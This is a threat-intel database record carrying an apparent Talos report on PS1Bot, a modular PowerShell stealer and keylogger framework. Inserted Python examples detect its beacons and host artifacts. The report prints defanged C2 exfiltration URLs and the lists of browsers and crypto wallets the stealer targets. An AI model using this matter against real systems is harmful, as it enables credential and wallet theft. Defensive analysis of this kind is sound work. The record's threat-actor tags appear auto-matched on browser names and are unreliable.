{
	"id": "f9fc09f3-035b-44c2-bdb1-33ba91f940c5",
	"created_at": "2026-04-06T00:14:45.107735Z",
	"updated_at": "2026-04-10T03:37:09.306105Z",
	"deleted_at": null,
	"sha1_hash": "af771e2a33fc545ce7a4a2a0f89910843eb484c0",
	"title": "Malvertising campaign leads to PS1Bot, a multi-stage malware framework",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1607785,
	"plain_text": "Malvertising campaign leads to PS1Bot, a multi-stage malware framework\r\nBy Edmund Brumaghin\r\nPublished: 2025-08-12 · Archived: 2026-04-05 21:52:41 UTC\r\nCisco Talos has observed an ongoing malware campaign that seeks to infect victims with a multi-stage malware framework, implemented in PowerShell and C#, which we are referring to as “PS1Bot.”\r\nPS1Bot features a modular design, with several modules delivered to perform a variety of malicious activities on infected systems, including information theft, keylogging, reconnaissance and the establishment of persistent system access.\r\nPS1Bot has been designed with stealth in mind, minimizing persistent artifacts left on infected systems and incorporating in-memory execution techniques to facilitate execution of follow-on modules without requiring them to be written to disk.\r\nPS1Bot distribution campaigns have been extremely active since early 2025, with new samples being observed frequently throughout the year.\r\nThe information stealer module leverages wordlists embedded in the stealer to enumerate files containing passwords and seed phrases that can be used to access cryptocurrency wallets, which the stealer also attempts to exfiltrate from infected systems.\r\nCampaign Overview\r\nCisco Talos has been monitoring an ongoing malware campaign that has been active throughout 2025. The campaign appears to be leveraging malvertising to direct victims to a multi-stage malware framework, implemented in PowerShell and C#, that possesses robust functionality, including the ability to deliver follow-on modules such as an information stealer, keylogger, screen capture collector and more. It also establishes persistence to continue operations following system reboots. 
The design of this malware framework appears to attempt to minimize artifacts left on infected systems by facilitating the delivery and execution of modules in memory, without requiring them to be written to disk. Due to similarities in design and implementation with the malware family AHK Bot, we are referring to this PowerShell-based malware as “PS1Bot.”\r\nThis campaign has been extremely active, with new samples being observed continuously over the past several months. The cluster of malicious activity associated with this campaign also overlaps with prior reporting, including reporting on Skitnet. While Talos has not observed delivery of the Skitnet binary in any of the infection chains we analyzed, the PowerShell implementation described in that reporting appears to match the components delivered throughout the infection chain in this case as well. We have also observed significant overlap in the C2 infrastructure used in both cases. Likewise, we have observed code and indicator overlap with previously reported malvertising campaigns.\r\nDelivery\r\nhttps://blog.talosintelligence.com/ps1bot-malvertising-campaign/\r\nPage 1 of 21\n\nThe victim is initially delivered a compressed archive. 
The file names Talos observed in the wild are consistent with what is typically seen during search engine optimization (SEO) poisoning and/or malvertising campaigns, where the file name matches the keyword phrase being targeted in the campaigns:\r\nchapter 8 medicare benefit policy manual.zip\r\nCounting Canadian Money Worksheets Pdf.zip.e49\r\nzebra gx430t manual.zip.081\r\nkosher food list pdf (1).zip.c9a\r\npambu panchangam 2024-25 pdf.zip.a7a\r\nPrior reporting on social media further strengthens this assessment, where researchers have observed the malvertising campaigns leading to the compressed archives delivered in this campaign.\r\nInside the compressed archive is a single file called “FULL DOCUMENT.js” that functions as a downloader, retrieving the next stage of the infection. In the cases analyzed, the JS file contained VBScript, which employed a variety of obfuscation methods throughout 2025. Below is one of the simpler examples observed recently.\r\nFigure 1. Deobfuscating the downloader script.\r\nStage 1 retrieval\r\nWhen executed, the malware retrieves a JScript scriptlet from an attacker-controlled server, the contents of which are then executed.\r\nFigure 2. Example JScript scriptlet contents.\r\nThis script is responsible for performing the environmental setup needed for subsequent malware operations to function properly. This includes writing a PowerShell script to C:\\ProgramData\\ (ntu.ps1 in this case) and then executing the contents of that file; the script body is redacted for space in the previous screenshot. This PowerShell script obtains the serial number of the C:\\ drive and uses it to construct a URL, which it uses to attempt to establish a connection to the command and control (C2) server to retrieve additional malicious content to execute. 
Any PowerShell content received is then passed to Invoke-Expression (IEX) and executed within the existing PowerShell process. This is repeated in a loop with Sleep() delays added between each iteration.\r\nFigure 3. PowerShell module retrieval and C2 polling.\r\nThis allows the malware to continue to run, periodically polling the attacker’s C2 server to retrieve additional commands to execute within the PowerShell process running on the system. We have observed this technique used to deliver a variety of additional modules, each enabling the attacker to conduct additional operations on the system, obtain additional environmental information about systems under their control, and enable the theft of sensitive information such as credentials, session tokens and financial account details (cryptocurrency wallet data).\r\nPowerShell modules\r\nWe have observed the delivery of the following types of PowerShell modules during and after the initial infection process. Each module is responsible for carrying out its respective task, and several rely on delivery of C# classes that are dynamically compiled to generate assembly DLLs and executed to assist with collection of survey information, keylogging, and screenshot capture.\r\nAntivirus detection\r\nScreen capture\r\nWallet grabber\r\nKeylogger\r\nInformation collection\r\nPersistence\r\nIn most of the modules analyzed, logging functionality has been built in to allow the attacker to monitor the installation and runtime status during and post-deployment. In most cases, these status updates are delivered to the C2 server in the form of URL parameters included in HTTP GET requests to the URL used to establish an initial C2 connection. 
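Because every module reports through the same channel (a GET to the drive-serial path with the status text in a single k= parameter, in the result = X; status = Y, script: ..., status: ..., message: ... and Module: ..., Status: ..., Message: ... shapes quoted later on this page), the beacons are straightforward to pull out of proxy logs. The following Python is an added example written for this page, not code from the Talos post. The log line layout (timestamp, client, method, URL), the C2 address, the drive serial and the status lines are constructed; the post does not say how the serial is formatted, so the decoder only requires a single-segment path:

```python
# Added example (not code from the Talos post): decode PS1Bot-style status
# beacons out of web proxy logs. URL shape, per the post:
#   http://<c2>/<drive-serial>?k=<url-encoded status text>
# The post does not show how the drive serial is formatted, so the decoder only
# requires a single non-empty path segment. The log format below is a
# constructed, simplified proxy record (timestamp client method url).
from urllib.parse import urlsplit, unquote

# Constructed sample lines modelled on the three status formats quoted in the post
# (antivirus result, screen capture, keylogger), one unrelated k= request and
# one bare poll with no status text. 203.0.113.10 is a documentation address.
SAMPLE_LOG = '''
2025-08-01T10:00:01Z 10.0.0.5 GET http://203.0.113.10/1A2B3C4D?k=result%20=%20Windows%20Defender;%20%20status%20=%20success
2025-08-01T10:00:31Z 10.0.0.5 GET http://203.0.113.10/1A2B3C4D?k=script:%20screen,%20status:%20OK,%20message:%20screen%20uploaded
2025-08-01T10:01:02Z 10.0.0.5 GET http://203.0.113.10/1A2B3C4D?k=Module:%20KeyLogger,%20Status:%20running,%20Message:%20Logger%20started%20with%20PID%209164
2025-08-01T10:01:05Z 10.0.0.7 GET http://example.com/search?k=benign
2025-08-01T10:01:09Z 10.0.0.5 GET http://203.0.113.10/1A2B3C4D
'''


def status_param(query):
    '''Return the decoded k= value, or None. Splits on & only, because the
    antivirus format carries a literal ; inside the value.'''
    for part in query.split('&'):
        if part.startswith('k='):
            return unquote(part[2:])
    return None


def parse_status(text):
    '''Turn status text into a dict with lower-case keys. Handles both shapes
    seen in the post: key = value pairs joined by ; and key: value pairs
    joined by , (each field is split on its first = or :, so a message may
    itself contain either character).'''
    sep = ';' if ';' in text else ','
    fields = {}
    for part in text.split(sep):
        part = part.strip()
        if not part:
            continue
        cut = min((i for i in (part.find('='), part.find(':')) if i >= 0), default=-1)
        if cut < 0:
            fields.setdefault('raw', part)
        else:
            fields[part[:cut].strip().lower()] = part[cut + 1:].strip()
    return fields


def decode_beacon(url):
    '''Classify one URL as a PS1Bot-style status beacon, a bare poll, or None.
    A k= value only counts when it carries a status field; bare polls are
    returned too, and find_beacons() decides whether they are worth keeping.'''
    u = urlsplit(url)
    segments = [s for s in u.path.split('/') if s]
    if len(segments) != 1 or not u.hostname:
        return None
    rec = {'c2': u.hostname, 'drive_serial': segments[0], 'kind': 'poll', 'fields': {}, 'module': None}
    text = status_param(u.query)
    if text is not None:
        fields = parse_status(text)
        if 'status' not in fields:
            return None
        rec['kind'] = 'status'
        rec['fields'] = fields
        # The keylogger logs Module:, the screen module logs script:, and the
        # antivirus result carries no module name at all.
        rec['module'] = fields.get('module') or fields.get('script') or 'unlabelled'
    return rec


def find_beacons(log_text):
    '''Scan proxy log lines. Keep every status beacon, plus bare polls to a
    (c2, drive_serial) pair that also produced a status beacon, so single-segment
    URLs on unrelated hosts are not reported.'''
    candidates = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        rec = decode_beacon(parts[3])
        if rec is not None:
            rec['ts'], rec['client'] = parts[0], parts[1]
            candidates.append(rec)
    confirmed = {(r['c2'], r['drive_serial']) for r in candidates if r['kind'] == 'status'}
    return [r for r in candidates if (r['c2'], r['drive_serial']) in confirmed]


if __name__ == '__main__':
    for r in find_beacons(SAMPLE_LOG):
        print(r['ts'], r['client'], r['c2'], r['drive_serial'], r['kind'], r['module'], r['fields'])
```

Bare polls (no k= parameter) are only reported for a host and serial pair that also produced a status beacon; otherwise every single-segment URL crossing the proxy would match. Exception text in the error form may contain commas, so each field is split on its first separator only and the first unparsed fragment is kept under a raw key rather than dropped.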
\r\nWe assess with high confidence that additional modules likely exist and are deployable as desired by the adversary. The modular nature of this malware provides flexibility and enables the rapid deployment of updates or new functionality as needed. While analyzing activity associated with PS1Bot throughout 2025, we have observed development activity occurring over time, indicating that this is a rapidly evolving threat.\r\nAntivirus detection\r\nThis PowerShell module is delivered after initial C2 establishment and is responsible for obtaining and reporting the antivirus programs present on the infected system. This is accomplished by querying Windows Management Instrumentation (WMI) to obtain a list of installed antivirus products.\r\nFigure 4. Antivirus detection logic.\r\nThe returned product list is then transmitted to the attacker via an HTTP GET request containing the results of the operation as URL parameters.\r\nFigure 5. Status logging implementation.\r\nThe following is an example of the URL structure used to transmit the information to the C2 server:\r\nhxxp[:]//[C2_SERVER_IP]/[DRIVE_SERIAL]?k=result%20=%20Windows%20Defender;%20%20status%20=%20success\r\nOnce this is completed, execution is passed back to the main PowerShell script and C2 beaconing continues until additional instructions are received. In several cases, we have observed the delivery of multiple distinct PowerShell scripts during the infection process. To deliver a new PowerShell script, the attacker simply changes the response content served at the C2 URL derived initially. 
Each time the infected system beacons to the C2 server, any delivered PowerShell is dynamically passed to IEX and executed.\r\nScreen capture\r\nOnce antivirus detection has been performed, we have observed the delivery of additional PowerShell modules, one of which is used to capture screenshots on infected systems and transmit the resulting images to the C2 server. This is often performed for a variety of reasons, including to identify when systems are in active use by victims versus unattended, or to collect sensitive information that is displayed on screen but not otherwise recorded for easy exfiltration.\r\nIn this case, the adversary is using PowerShell to dynamically compile and execute a C# assembly DLL at runtime.\r\nFigure 6. Example use of Add-Type for C# compilation.\r\nThe resulting DLL is then used to capture the screenshot and create a Bitmap image (.BMP) inside the %TEMP% directory. The image is later converted and stored as a JPEG at %APPDATA%\\Screenshot.jpg.\r\nFigure 7. Screenshot generation logic.\r\nThe content of the image file is then Base64 encoded and the resulting data is transmitted to C2. The image files in both %TEMP% and %APPDATA% are then deleted.\r\nFigure 8. 
Example HTTP POST containing Base64 encoded screenshot image file.\r\nAdditionally, status logging messages are sent to inform the attacker of the module’s progress, examples of which are shown below.\r\nSuccessful screenshot collection:\r\nhxxp[:]//[C2_SERVER_IP]/[DRIVE_SERIAL]?k=script:%20screen,%20status:%20OK,%20message:%20screen%20uploaded\r\nFailed screenshot collection:\r\nhxxp[:]//[C2_SERVER_IP]/[DRIVE_SERIAL]?k=script:%20screen,%20status:%20error,%20message:%20[EXCEPTION_INFORMATION]\r\nGrabber\r\nFollowing successful collection of screenshots on infected systems, we have observed the delivery of an additional PowerShell module that the attacker refers to as the “grabber module” that is used to steal sensitive data from infected systems. It is designed to target the following types of data, which are then exfiltrated to the C2 server:\r\nLocal browser storage (stored credentials, cookies, etc.)\r\nBrowser extension data for cryptocurrency-related extensions like wallets\r\nLocal application data for cryptocurrency wallet applications\r\nFiles containing passwords, sensitive strings or wallet seed phrases\r\nThe module begins by checking the values of variables that were declared in earlier stages of the infection process. If the script is not being executed within the context of the PowerShell process established earlier, it will fail and terminate execution.\r\nNext, it begins transmitting status logging messages to the C2 server via HTTP GET requests to inform the attacker that the grabber module is running and to provide basic runtime information. 
Log messages are periodically transmitted during the execution of this module to provide ongoing status updates, error alerting and other relevant information throughout the execution process.\r\nThe malware first checks for the existence of various installed applications of interest, including browsers, browser extensions and cryptocurrency wallet applications. If found, the application data is copied to %TEMP% for staging.\r\nThe malware specifically checks for the existence of application data associated with the following web browsers:\r\nGoogle Chrome\r\nMicrosoft Edge\r\nOpera\r\nOpera GFX\r\nBrave\r\nVivaldi\r\nYandex\r\nSlimjet\r\nEpic Privacy Browser\r\nComodo Dragon\r\nCentBrowser\r\nNaver Whale\r\nSRWare Iron\r\nBlisk\r\nTorch\r\nCoc Coc\r\nAmigo\r\nChromium\r\n7Star\r\nAtom\r\nAVG Secure Browser\r\nAvast Secure Browser\r\nCCleaner Browser\r\nChedot\r\nChrome Beta\r\nChrome Canary\r\nCitrio\r\nCoolNovo\r\nCoowon\r\nCryptoTab Browser\r\nElements Browser\r\nIridium\r\nKinza\r\nWavebo\r\nKometa\r\nMaxthon\r\nMustang\r\nNetbox Browser\r\nOrbitum\r\nQQ Browser\r\nSalamWeb\r\nSidekick\r\nSleipnir\r\nSputnik\r\nSuperbird\r\nSwing Browser\r\nTempest\r\nUC Browser\r\nUlaa\r\nUR Browser\r\nViasat Browser\r\nIn addition to the previously listed browsers, the information stealer also checks for the installation of the following Chromium extensions, most of which are associated with cryptocurrency wallets and multi-factor authentication (MFA) authenticators:\r\nMetaMask\r\nMetaMask-edge\r\nMetaMask-Opera\r\nTrust-Wallet\r\nAtomic-Wallet\r\nBinance\r\nPhantom\r\nCoinbase\r\nRonin\r\nExodus\r\nCoin98\r\nKardiaChain\r\nTerraStation\r\nWombat\r\nHarmoney\r\nNami\r\nMartianAptos\r\nBraavos\r\nXDEFI\r\nYoroi\r\nTrezor\r\nLedger\r\nMycelium\r\nTrustWallet\r\nEllipal\r\nDapper\r\nBitKeep\r\nArgent\r\nBlockchain Wallet\r\ncryptocom-wallet-extension\r\nZerion\r\nAave\r\nCurve\r\nSushiSwap\r\nUniswap\r\n1inch\r\npetra-aptos-wallet\r\nmanta-wallet\r\nTON\r\nTron\r\nwallet-guard-protect-your\r\nsubwallet-polkadot-wallet\r\nargent-x-starknet-wallet\r\nbitget-wallet-formerly-bi\r\ncore-crypto-wallet-nft-ex\r\nbraavos-starknet-wallet\r\nKepler\r\nmartian-aptos-sui-wallet\r\nxverse-wallet\r\ngate-wallet\r\nsender-wallet\r\ndesig-wallet\r\nfewcha-move-wallet\r\nkepler-edge\r\nokx-wallet\r\nunisat-wallet\r\nxdefi-wallet\r\nrose-wallet\r\nAuthenticator\r\nIf discovered, associated extension data is staged using a process similar to that described earlier for web browser application data. The information stealer also attempts to locate locally installed cryptocurrency wallet applications and MFA applications, including the following:\r\nAuthy Desktop\r\nExodus\r\nCoinomi\r\nBitcoin Core\r\nBinance\r\nAtomic\r\nElectrum\r\nDaedalus\r\nLedger Live\r\nZcash\r\nArmory\r\nBytecoin\r\nEthereum\r\nGuarda\r\nTrustWallet\r\nOne interesting piece of functionality included with the information stealer is a scanner designed to identify and exfiltrate files containing sensitive information. The script contains a large wordlist of English words. We have also observed variants of the grabber module that contain wordlists targeting other languages, such as Czech. Additionally, we have observed versions that contain multiple wordlists targeting different cryptocurrency wallet seed phrase combinations.\r\nFigure 9. Wallet seed phrase wordlist.\r\nThis wordlist is used to identify files that may contain cryptocurrency wallet seed phrases, which can be used to regain access to wallets in the case that the primary authentication method is unavailable. This is performed by iterating through the file system on local hard drives, identifying files matching specific file extensions and file sizes, and then scanning them for the presence of multiple string values matching the wordlist.\r\nFigure 10. 
File scanning parameters.\r\nIt also attempts to identify files that may contain passwords.\r\nFigure 11. Password file detection criteria.\r\nOnce the sensitive information has been collected, it is compressed and exfiltrated to the attacker’s C2 server.\r\nFigure 12. Compressed archive exfiltration logic.\r\nData compression and exfiltration is performed via an HTTP POST request, as shown in Figure 13.\r\nFigure 13. Example HTTP POST containing compressed archive.\r\nAny discovered wallet seed phrases are communicated to the attacker using HTTP GET requests, using a format similar to the one in Figure 14.\r\nFigure 14. Transmission of detected wallet seed phrase contents.\r\nThis demonstrates a robust information stealer that, in this case, has been implemented as a PowerShell module.\r\nKeylogger\r\nThe keylogging and clipboard capture module is implemented similarly to the screen capture module described earlier, with PowerShell being used to dynamically compile and execute a C# assembly DLL at runtime.\r\nFigure 15. Example use of Add-Type in PowerShell.\r\nThe keylogger uses SetWindowsHookEx() to monitor keyboard and mouse events to facilitate the capture of keystrokes and mouse activity on the system.\r\nFigure 16. Example SetWindowsHookEx() logic.\r\nClipboard contents are also monitored so that copied information can be logged as well. As with other modules, status logging has been implemented and is performed via HTTP GET requests, an example of which is:\r\nhxxp[:]//[C2_SERVER_IP]/[DRIVE_SERIAL]?k=Module:%20KeyLogger,%20Status:%20running,%20Message:%20Logger%20started%20with%20PID%209164\r\nThe module also relays this status in the body of an HTTP POST request.\r\nFigure 17. 
Status logging transmission to C2.\r\nCollected data is transmitted to the attacker via HTTP POST requests similar to Figure 18.\r\nFigure 18. Keystroke log transmission.\r\nInformation collection\r\nWe have also observed the delivery of a system survey module that the attacker refers to as “WMIComputerCSHARP” that is used to collect and transmit information about the infected system and environment to the attacker. Consistent with the design of the screenshot and keylogging modules, this module is implemented using a combination of PowerShell and C# and features the use of runtime compilation.\r\nThe module uses WMI to query the domain membership information of the infected system, likely to enable the attacker to determine whether they have gained access to a high-value target.\r\nFigure 19. Survey collection status logging message.\r\nThe following WMI queries are performed as part of this process:\r\nSELECT Domain, PartOfDomain FROM Win32_ComputerSystem\r\nSELECT DomainName FROM Win32_NTDomain WHERE ClientSiteName IS NOT NULL\r\nIn addition, the %USERDNSDOMAIN% environment variable is also queried to attempt to enumerate the domain membership of the infected system. The collected information is transmitted to the attacker’s C2 server, consistent with what was described for other modules.\r\nFigure 20. Example status logging implementation.\r\nPersistence\r\nWe have also observed the delivery of a persistence module that can be used as desired to ensure that the main looping mechanism is re-executed following a system restart or user session termination. 
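Host-side triage for the on-disk behaviours this page describes, as an added example that is not code from the Talos post: powershell.exe spawning csc.exe (Windows PowerShell 5.1 compiles the inline C# handed to Add-Type through csc.exe, which is what the screen capture, keylogger and survey modules rely on; PowerShell 7 compiles in process and leaves no such child process), a .ps1 written under ProgramData by a script host (stage 1 drops ntu.ps1 there, and the persistence module described in this section creates its own randomly named subdirectory and script), and a .lnk dropped in a Startup folder. The events are constructed dicts in the shape of Sysmon event ID 1 (process create) and event ID 11 (file create), not real Sysmon records; every path, file name and PID is invented, and paths are written with forward slashes, which PureWindowsPath accepts alongside the native separator:

```python
# Added example (not code from the Talos post): triage of Sysmon-style
# process-create (ID 1) and file-create (ID 11) events for PS1Bot host
# artifacts. Event dicts are constructed and simplified; in real telemetry
# map Image, ParentImage, TargetFilename and ProcessId onto these keys.
from pathlib import PureWindowsPath

SCRIPT_HOSTS = {'powershell.exe', 'pwsh.exe', 'wscript.exe', 'cscript.exe'}


def _parts(path):
    '''Lower-cased path components; PureWindowsPath accepts / or the native
    separator, and parts[0] is the drive root.'''
    return [p.lower() for p in PureWindowsPath(path).parts]


def _basename(path):
    return PureWindowsPath(path).name.lower()


def is_addtype_compile(ev):
    '''Windows PowerShell 5.1 compiles Add-Type C# through csc.exe, so the
    screenshot, keylogger and survey modules show up as powershell.exe
    spawning csc.exe. PowerShell 7 compiles in process and will not match.'''
    return (ev['event'] == 'ProcessCreate'
            and _basename(ev['image']) == 'csc.exe'
            and _basename(ev['parent_image']) in SCRIPT_HOSTS)


def is_programdata_script(ev):
    '''A .ps1 written anywhere under <drive>/ProgramData by a script host:
    stage 1 drops ntu.ps1 there and the persistence module creates a random
    subdirectory holding a random .ps1.'''
    if ev['event'] != 'FileCreate':
        return False
    parts = _parts(ev['target'])
    return (parts[-1].endswith('.ps1')
            and len(parts) >= 3 and parts[1] == 'programdata'
            and _basename(ev['image']) in SCRIPT_HOSTS)


def is_startup_shortcut(ev):
    '''A .lnk created in a per-user or all-users Startup folder by a script host.'''
    if ev['event'] != 'FileCreate':
        return False
    parts = _parts(ev['target'])
    return (parts[-1].endswith('.lnk')
            and len(parts) >= 2 and parts[-2] == 'startup'
            and 'start menu' in parts
            and _basename(ev['image']) in SCRIPT_HOSTS)


RULES = [('addtype_csc', is_addtype_compile),
         ('programdata_ps1', is_programdata_script),
         ('startup_lnk', is_startup_shortcut)]


def triage(events):
    '''Return (rule, pid, detail) for every event that matches a rule.'''
    hits = []
    for ev in events:
        for name, rule in RULES:
            if rule(ev):
                hits.append((name, ev['pid'], ev.get('target') or ev.get('command_line')))
    return hits


def persistence_pairs(hits):
    '''PIDs that both wrote a ProgramData .ps1 and dropped a Startup .lnk,
    which is the persistence module footprint described in the post.'''
    by_pid = {}
    for name, pid, _ in hits:
        by_pid.setdefault(pid, set()).add(name)
    return sorted(pid for pid, names in by_pid.items()
                  if {'programdata_ps1', 'startup_lnk'} <= names)


# Constructed events: one Add-Type compile, the stage 1 script, the persistence
# module writing its script and Startup shortcut, and two benign events.
PS = 'C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe'
SAMPLE_EVENTS = [
    {'event': 'ProcessCreate', 'pid': 4120, 'parent_image': PS,
     'image': 'C:/Windows/Microsoft.NET/Framework64/v4.0.30319/csc.exe',
     'command_line': 'csc.exe /noconfig /fullpaths @C:/Users/victim/AppData/Local/Temp/abc.cmdline'},
    {'event': 'FileCreate', 'pid': 3988, 'image': PS, 'target': 'C:/ProgramData/ntu.ps1'},
    {'event': 'FileCreate', 'pid': 3988, 'image': PS, 'target': 'C:/ProgramData/k2fj9x/m8s1qd.ps1'},
    {'event': 'FileCreate', 'pid': 3988, 'image': PS,
     'target': 'C:/Users/victim/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/q7w2e.lnk'},
    {'event': 'FileCreate', 'pid': 1204, 'image': 'C:/Windows/explorer.exe',
     'target': 'C:/Users/victim/Desktop/Report.lnk'},
    {'event': 'ProcessCreate', 'pid': 5010, 'parent_image': 'C:/Windows/explorer.exe',
     'image': 'C:/Windows/System32/notepad.exe', 'command_line': 'notepad.exe'},
]

if __name__ == '__main__':
    hits = triage(SAMPLE_EVENTS)
    for hit in hits:
        print(*hit)
    print('persistence pairs:', persistence_pairs(hits))
```

A PID that both writes a ProgramData .ps1 and drops a Startup .lnk is the persistence module's footprint; either rule alone is noisier (installers create Startup shortcuts, and some management agents keep scripts under ProgramData), so persistence_pairs() is the alert worth paging on and the single-rule hits are supporting context. The csc.exe rule is the one to tune by parent, not by image: csc.exe from a build tool or Visual Studio is normal, csc.exe under a script host is not.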
Re-executing the polling loop at startup allows the reestablishment of a C2 communications channel and enables the delivery of additional modules as desired by the adversary.\r\nThe module begins by attempting to create a PowerShell script that will be executed each time the system restarts. The module creates a randomly named directory within the %PROGRAMDATA% directory that will be used to store the components needed for persistence. These include a randomly named PowerShell script (PS1) as well as a randomly named icon file (ICO). A malicious randomly named LNK file is also created in the Startup directory that is configured to point to the PowerShell script previously created so that it can be executed each time the system is rebooted.\r\nFigure 21. Persistence module file creation parameters.\r\nThe ICO file is created using base64-encoded content delivered as part of the module itself. The PowerShell script contents are generated by retrieving an obfuscated blob from the C2 server, which in our sample was hosted at the URL path /transform.\r\nFigure 22. Persistence payload retrieval.\r\nA simulated example of this process is shown in Figure 23.\r\nFigure 23. Simulated delivery of obfuscated persistence payload.\r\nThis content is then written to the PS1 file and the LNK file is generated with the appropriate parameters to enable execution in the future. When deobfuscated, the contents of the PowerShell script simply contain the same logic used to establish the C2 polling process described earlier in the infection chain.\r\nFigure 24. 
Deobfuscated persistence payload.\r\nWe assess with high confidence that there are likely additional modules available for deployment as needed by the adversary, and the use of this framework provides a flexible means to rapidly enhance and extend the functionality available.\r\nLinks to previous intrusion activity\r\nDuring our analysis of the code and functionality associated with this infection chain, we observed similarities with components referenced in prior reporting related to the use of Skitnet/Bossnet to deliver PowerShell modules to infected systems. We have also observed multiple overlaps in the C2 infrastructure used in this campaign and the one described by the aforementioned reporting. Additionally, we assess with high confidence that the final deobfuscated payload dropped by the persistence module previously described was likely created by the same entity who created the PowerShell script described in the prior reporting. The overall implementation, use of specific variables throughout the code, and matching C2 URL construction strengthen this assessment. Below is a comparison of the code in both instances.\r\nFigure 25. Comparison of persistence payload (left) vs. ProDaft reporting (right).\r\nAs observable in Figure 25, the only difference between the two samples is the addition of mutex handling and sleep periods.\r\nWhile Talos did not identify any direct overlap in activity related to these malware families, we noted similarities in the design architecture and functionality provided by the PS1Bot malware delivered in this case and that present in another malware family Talos previously reported on called AHK Bot. The derivation of the C2 URL path based on the drive serial number is consistent across both malware families. 
Likewise, the use of a main polling script and subsequent delivery and execution of purpose-built modules is also similar to the design architecture found with AHK Bot. There are also several similarities in the types of modules available for both malware families. Heavy use of URL parameters when communicating with C2 is another similarity between the two families.\r\nCoverage\r\nWays our customers can detect and block this threat are listed below.\r\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.\r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.\r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.\r\nCisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.\r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.\r\nCisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles. Secure Access provides seamless, transparent and secure access to the internet, cloud services or private applications no matter where your users work. Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access. 
\r\nUmbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.\r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.\r\nAdditional protections with context to your specific environment and threat data are available from the Firewall Management Center.\r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.\r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.\r\nSnort SIDs for the threats are:\r\nSnort2: 65231 - 65233\r\nSnort3: 65231 - 65233\r\nClamAV detections are also available for this threat:\r\nWin.Backdoor.PS1Bot-10056514-0\r\nWin.Backdoor.PS1Bot-10056515-0\r\nWin.Backdoor.PS1Bot-10056516-0\r\nWin.Backdoor.PS1Bot-10056517-0\r\nWin.Backdoor.PS1Bot-10056518-0\r\nWin.Backdoor.PS1Bot-10056519-0\r\nWin.Backdoor.PS1Bot-10056520-0\r\nWin.Backdoor.PS1Bot-10056521-0\r\nWin.Backdoor.PS1Bot-10056522-0\r\nWin.Backdoor.PS1Bot-10056523-0\r\nWin.Backdoor.PS1Bot-10056524-0\r\nWin.Backdoor.PS1Bot-10056525-0\r\nWin.Backdoor.PS1Bot-10056526-0\r\nWin.Backdoor.PS1Bot-10056527-0\r\nWin.Backdoor.PS1Bot-10056528-0\r\nWin.Backdoor.PS1Bot-10056529-0\r\nWin.Backdoor.PS1Bot-10056530-0\r\nWin.Backdoor.PS1Bot-10056531-0\r\nWin.Backdoor.PS1Bot-10056532-0\r\nWin.Backdoor.PS1Bot-10056533-0\r\nWin.Backdoor.PS1Bot-10056534-0\r\nWin.Backdoor.PS1Bot-10056535-0\r\nWin.Backdoor.PS1Bot-10056536-0\r\nWin.Backdoor.PS1Bot-10056537-0\r\nWin.Backdoor.PS1Bot-10056538-0\r\nWin.Backdoor.PS1Bot-10056539-0\r\nWin.Backdoor.PS1Bot-10056540-0\r\nWin.Backdoor.PS1Bot-10056541-0\r\nWin.Backdoor.PS1Bot-10056542-0\r\nIndicators of 
compromise (IOCs)\r\nIOCs for this threat can be found in our GitHub repository here.\r\nSource: https://blog.talosintelligence.com/ps1bot-malvertising-campaign/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.talosintelligence.com/ps1bot-malvertising-campaign/"
	],
	"report_names": [
		"ps1bot-malvertising-campaign"
	],
	"threat_actors": [
		{
			"id": "0661a292-80f3-420b-9951-a50e03c831c0",
			"created_at": "2023-01-06T13:46:38.928796Z",
			"updated_at": "2026-04-10T02:00:03.148052Z",
			"deleted_at": null,
			"main_name": "IRIDIUM",
			"aliases": [],
			"source_name": "MISPGALAXY:IRIDIUM",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df",
			"created_at": "2023-01-06T13:46:38.402513Z",
			"updated_at": "2026-04-10T02:00:02.959797Z",
			"deleted_at": null,
			"main_name": "Sandworm",
			"aliases": [
				"IRIDIUM",
				"Blue Echidna",
				"VOODOO BEAR",
				"FROZENBARENTS",
				"UAC-0113",
				"Seashell Blizzard",
				"UAC-0082",
				"APT44",
				"Quedagh",
				"TEMP.Noble",
				"IRON VIKING",
				"G0034",
				"ELECTRUM",
				"TeleBots"
			],
			"source_name": "MISPGALAXY:Sandworm",
			"tools": [],
			"source_id": "MISPGALAXY",
